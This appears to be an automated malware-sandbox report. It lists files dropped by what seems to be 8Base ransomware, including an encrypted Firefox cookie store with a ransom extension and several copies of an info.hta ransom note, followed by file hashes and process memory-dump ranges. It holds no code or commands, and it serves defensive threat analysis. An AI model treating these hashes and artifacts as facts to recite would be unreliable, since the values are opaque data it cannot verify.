C:\Users\Admin\AppData\Local\Temp\nstBF74.tmp\InetLoad.dll

Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ncyvcqak.default-release\cookies.sqlite.id[F3547DDF-3483].[[email protected]].8base

Filesize
96KB

MD5
2cb4069626dd85a08c0fd4ecb1ea6c2a

SHA1
8340bdf29bcc30ec1b1b6598411f7e07f2cabd70

SHA256
ca1b4dc4f90c924f5afc7008c4d48b2838f4ca13b6912c86ee429339d4823163

SHA512
e91b2226809046a9ea08fe711ab9550e3f06e15841cbea47e23c3223172b3b6cc0273a82f470a5650e8e078b9bd05429d25d2d2d6bbd46cfc590d6fda0d24a45

Download Submit
C:\Users\Admin\AppData\Roaming\ddwdfeh

Filesize
618KB

MD5
3f6d5376b6d40c82644287c7621dfc5b

SHA1
f54b9ed42b60eb6793cd55ed25e6f2bd6120218f

SHA256
94dbf6089ceccafd34ec1011941f18682361d71a9fbc54d1495dc0f9ec52169e

SHA512
3ea3e7c045c015e8c455ed9f550784d7af75c2cba263913ffaa210652f74ed036a6541b71f95d11663ee6dd062059cbcad94c1148243852d01722dd8780d010c

Download Submit
C:\Users\Admin\AppData\Roaming\weijdaa

Filesize
438KB

MD5
7a6269975267078cc27f4e60b142516d

SHA1
092a05fab1f67847a91e4f4b320fb879206f9d57

SHA256
862c1c57bfdc6f30b88646ae35029427f91512fd5cf354d05a8339b8d94ff96c

SHA512
34abb6a7f904590e303c1431e68af7bd76f4a962ee41f145c432525631668754d1119665b8134495bccd453584c6b93bd521c29f0f15f069104f39607c178d05

Download Submit
C:\Users\Admin\Desktop\info.hta

Filesize
5KB

MD5
5687f4c824f55f30d8986252374dcdf3

SHA1
79a57cf8290bedc80454503f4d0dc99c4605aab8

SHA256
74edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af

SHA512
1b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447

Download Submit
C:\info.hta

Filesize
5KB

MD5
5687f4c824f55f30d8986252374dcdf3

SHA1
79a57cf8290bedc80454503f4d0dc99c4605aab8

SHA256
74edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af

SHA512
1b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447

Download Submit
C:\info.hta

Filesize
5KB

MD5
5687f4c824f55f30d8986252374dcdf3

SHA1
79a57cf8290bedc80454503f4d0dc99c4605aab8

SHA256
74edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af

SHA512
1b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447

Download Submit
C:\users\public\desktop\info.hta

Filesize
5KB

MD5
5687f4c824f55f30d8986252374dcdf3

SHA1
79a57cf8290bedc80454503f4d0dc99c4605aab8

SHA256
74edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af

SHA512
1b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447

Download Submit
F:\info.hta

Filesize
5KB

MD5
5687f4c824f55f30d8986252374dcdf3

SHA1
79a57cf8290bedc80454503f4d0dc99c4605aab8

SHA256
74edefbae6d291bb440c9f42fc5410f630ecb7511e3d96db3bf44651d5c5b0af

SHA512
1b9cd876fb34281678b465606f6a0cd9d1b72312576f239f2c7639a41816c0258147fcdcccd988e8957052bed1ad050bae083dc4e1d04669703643ce3859a447

Download Submit
\Users\Admin\AppData\Local\Temp\2DDC.tmp\aa_nts.dll

Filesize
902KB

MD5
480a66902e6e7cdafaa6711e8697ff8c

SHA1
6ac730962e7c1dba9e2ecc5733a506544f3c8d11

SHA256
7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5

SHA512
7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5

Download Submit
\Users\Admin\AppData\Local\Temp\nstBF74.tmp\InetLoad.dll

Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
memory/1224-65-0x00000000053C0000-0x00000000053F4000-memory.dmp

Filesize
208KB

Download
memory/1224-68-0x00000000053B0000-0x00000000053C0000-memory.dmp

Filesize
64KB

Download
memory/1224-64-0x0000000005230000-0x0000000005276000-memory.dmp

Filesize
280KB

Download
memory/1224-75-0x00000000736C0000-0x0000000073DAE000-memory.dmp

Filesize
6.9MB

Download
memory/1224-59-0x00000000008D0000-0x0000000000974000-memory.dmp

Filesize
656KB

Download
memory/1224-63-0x00000000736C0000-0x0000000073DAE000-memory.dmp

Filesize
6.9MB

Download
memory/1232-70-0x0000000005310000-0x0000000005320000-memory.dmp

Filesize
64KB

Download
memory/1232-66-0x00000000736C0000-0x0000000073DAE000-memory.dmp

Filesize
6.9MB

Download
memory/1232-69-0x00000000054C0000-0x00000000054F2000-memory.dmp

Filesize
200KB

Download
memory/1232-62-0x00000000009E0000-0x0000000000A80000-memory.dmp

Filesize
640KB

Download
memory/1232-82-0x00000000736C0000-0x0000000073DAE000-memory.dmp

Filesize
6.9MB

Download
memory/1232-67-0x00000000052D0000-0x0000000005312000-memory.dmp

Filesize
264KB

Download
memory/1476-7219-0x0000000000360000-0x000000000036C000-memory.dmp

Filesize
48KB

Download
memory/1476-6983-0x0000000000360000-0x000000000036C000-memory.dmp

Filesize
48KB

Download
memory/1476-6935-0x0000000000370000-0x0000000000377000-memory.dmp

Filesize
28KB

Download
memory/1740-4168-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1872-50-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-18-0x00000261C6E60000-0x00000261C6E63000-memory.dmp

Filesize
12KB

Download
memory/1872-39-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-41-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-43-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-45-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-37-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-38-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-36-0x00000261C70F0000-0x00000261C70F7000-memory.dmp

Filesize
28KB

Download
memory/1872-33-0x00000261C6E60000-0x00000261C6E63000-memory.dmp

Filesize
12KB

Download
memory/1872-46-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-94-0x00000261C70F0000-0x00000261C70F5000-memory.dmp

Filesize
20KB

Download
memory/1872-95-0x00007FFC1DE10000-0x00007FFC1DFEB000-memory.dmp

Filesize
1.9MB

Download
memory/1872-47-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-40-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-48-0x00007FFC1DE10000-0x00007FFC1DFEB000-memory.dmp

Filesize
1.9MB

Download
memory/1872-49-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-51-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-52-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-53-0x00007FF6E35B0000-0x00007FF6E36DF000-memory.dmp

Filesize
1.2MB

Download
memory/1872-58-0x00007FFC1DE10000-0x00007FFC1DFEB000-memory.dmp

Filesize
1.9MB

Download
memory/2504-12-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/2504-7-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/2504-22-0x0000000003E10000-0x0000000003E46000-memory.dmp

Filesize
216KB

Download
memory/2504-17-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2504-29-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2504-21-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/2504-15-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2504-16-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2504-14-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2504-10-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/2504-31-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2504-30-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/2504-28-0x0000000003E10000-0x0000000003E46000-memory.dmp

Filesize
216KB

Download
memory/2504-13-0x00000000012F0000-0x00000000012F7000-memory.dmp

Filesize
28KB

Download
memory/3184-96-0x00000000005D0000-0x00000000005E6000-memory.dmp

Filesize
88KB

Download
memory/3356-4165-0x0000000073520000-0x0000000073C0E000-memory.dmp

Filesize
6.9MB

Download
memory/3356-4024-0x0000000004FB0000-0x0000000004FC0000-memory.dmp

Filesize
64KB

Download
memory/3356-4016-0x00000000026F0000-0x0000000002736000-memory.dmp

Filesize
280KB

Download
memory/3356-4015-0x0000000073520000-0x0000000073C0E000-memory.dmp

Filesize
6.9MB

Download
memory/3792-6795-0x0000000000400000-0x000000000046B000-memory.dmp

Filesize
428KB

Download
memory/3792-6794-0x0000000000470000-0x00000000004E5000-memory.dmp

Filesize
468KB

Download
memory/3796-93-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/3796-1769-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4104-0-0x0000000000710000-0x00000000007E6000-memory.dmp

Filesize
856KB

Download
memory/4104-5-0x0000000005360000-0x00000000053AC000-memory.dmp

Filesize
304KB

Download
memory/4104-4-0x00000000052F0000-0x0000000005358000-memory.dmp

Filesize
416KB

Download
memory/4104-3-0x00000000051E0000-0x00000000051F0000-memory.dmp

Filesize
64KB

Download
memory/4104-2-0x0000000005120000-0x0000000005198000-memory.dmp

Filesize
480KB

Download
memory/4104-1-0x00000000736C0000-0x0000000073DAE000-memory.dmp

Filesize
6.9MB

Download
memory/4104-6-0x00000000058B0000-0x0000000005DAE000-memory.dmp

Filesize
5.0MB

Download
memory/4104-11-0x00000000736C0000-0x0000000073DAE000-memory.dmp

Filesize
6.9MB

Download
memory/4468-212-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-109-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-79-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-71-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-111-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-112-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-116-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-129-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-117-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-76-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-218-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-264-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4468-217-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4812-5020-0x0000000000C20000-0x0000000000C3A000-memory.dmp

Filesize
104KB

Download
memory/4812-5797-0x0000000073520000-0x0000000073C0E000-memory.dmp

Filesize
6.9MB

Download
memory/4812-4237-0x0000000000C50000-0x0000000000CE6000-memory.dmp

Filesize
600KB

Download
memory/4812-4268-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/4812-4280-0x0000000000B10000-0x0000000000B1A000-memory.dmp

Filesize
40KB

Download
memory/4812-4303-0x0000000004E20000-0x0000000004EBC000-memory.dmp

Filesize
624KB

Download
memory/4812-4340-0x00000000009F0000-0x0000000000A32000-memory.dmp

Filesize
264KB

Download
memory/4812-4749-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/4812-4248-0x0000000004CE0000-0x0000000004D72000-memory.dmp

Filesize
584KB

Download
memory/4812-4240-0x0000000073520000-0x0000000073C0E000-memory.dmp

Filesize
6.9MB

Download
memory/4812-6444-0x0000000004CC0000-0x0000000004CD0000-memory.dmp

Filesize
64KB

Download
memory/4812-5050-0x0000000000C00000-0x0000000000C06000-memory.dmp

Filesize
24KB

Download
memory/5024-97-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5024-77-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5024-81-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5052-87-0x00000000058E0000-0x00000000058F0000-memory.dmp

Filesize
64KB

Download
memory/5052-86-0x0000000002FE0000-0x0000000003026000-memory.dmp

Filesize
280KB

Download
memory/5052-85-0x0000000073760000-0x0000000073E4E000-memory.dmp

Filesize
6.9MB

Download
memory/5052-92-0x0000000073760000-0x0000000073E4E000-memory.dmp

Filesize
6.9MB

Download